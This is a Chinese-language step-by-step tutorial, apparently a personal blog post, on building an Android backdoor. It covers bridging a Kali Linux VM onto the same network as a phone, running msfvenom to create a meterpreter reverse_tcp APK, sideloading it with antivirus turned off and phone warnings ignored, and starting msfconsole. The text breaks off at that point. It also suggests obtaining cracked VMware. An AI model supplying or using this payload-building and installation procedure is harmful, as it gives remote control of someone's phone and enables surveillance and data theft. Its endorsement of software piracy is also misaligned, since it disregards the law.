张博洋:6、7、8这三步,如果遇到问题可以先跳过。我第一次做这个的时候,因为kali一直收不到手机的反弹,我在网上找了两天也找不到答案,我想到可能和网络有关,最后

发现,我的kali系统和手机根本就不在一个局域网下,kali的IP是172.22开头的,手机是192.168开头的,我一直都没发现……经过我的一番探索,终于研究出了解决方法,在这里加入了678三个步骤,不过对于不熟悉网络的可能稍微有点不太好操作。

1. 打开计算机;

2. 打开手机;

3. 使计算机和手机位于同一局域网下(简单说就是连同一个WiFi);

4. 在电脑里安装 VMware 这个软件(这个软件是付费软件,破解方法从网上能找到);

5. 安装Kali Linux 系统到VMware虚拟机里找到kali的官网,可以直接下载现成的VMware虚拟机文件(解压后的目录里有一个vmx文件),不用安装;

6. 打开VMware的“编辑”,打开“虚拟网络适配器”这个选项。然后点“编辑设置”(如果有),然后把net模式和仅主机模式的网络(如果有)都移除掉,选成“桥接模式”。

7. 下面不是有个“桥接到”的列表么,如果不知道选哪个,在你的手机里找到设置,找到WLAN,然后自己想办法看到网关和子网掩码。

8. 电脑上右击开始按钮打开命令提示符,直接输入ipconfig -All 检查你电脑的ip,找到和你手机一毛一样的子网掩码和默认网关,然后抬头往上看,上面隔着五六行,有一个

“描述”,“描述”俩字后面跟着一串英文。

9. 然后再回到虚拟网络适配器里面,在桥接模式的虚拟网络中你刚刚不知道选哪个的“桥接到”的列表里找见和”描述“后面一样的选项,把它选上,点应用。

10. 在打开虚拟机之前,先把下面的网络适配器换成你刚刚设置的那个。

11. 打开Kali 系统(记住用户名和密码);

12. 在桌面右击,打开终端窗口(点Open Terminal Here)

13. 在命令行输入命令 sudo su 然后回车,输入密码(输入的密码是看不见的)后回车,进入管理员模式(sudo即“super user do)

14. 输入 ip addr 查看本机ip地址;(像这样的:192.168.*.**)

15. 输入命令:msfvenom -p android/meterpreter/reverse_tcp lhost=xxx.xxx.x.x lport=6666 R > xxx.apk

msfvenom 是一个用来生成后门的工具。-p 即payload,后面接的是攻击载荷: android不用解释;meterpreter是一个后渗透模块;

reverse_tcp是攻击方式(TCP反弹);lhost=后面的是监听地址(就是kali系统的IP);lport=后面接的是监听端口(0~65535随便选);

16. 回车后,先睡上一分钟,醒来时桌面上就应该出现了×××.apk这个文件

17. 想办法把这个安装包弄到手机上,最简单的方法是拿手机连电脑的蓝牙,然后进虚拟机里,右键复制文件,回到电脑里,先关掉杀毒软件,然后粘贴,用蓝牙发到手机

(如果连复制的英文都找不到可以放弃了);

18. 打开apk直接安装,正常手机会发现这是个病毒文件,直接无视风险继续安装

19. 安装过后,桌面上肯定会出现MainActivity这个玩意儿。这时再进入到kali,在命令行里输 msfconsole(一个漏洞测试工具),然后再睡上一分钟,醒来时应该就会出现一个显眼的图案:(随机产生,可能是人头或者牛头)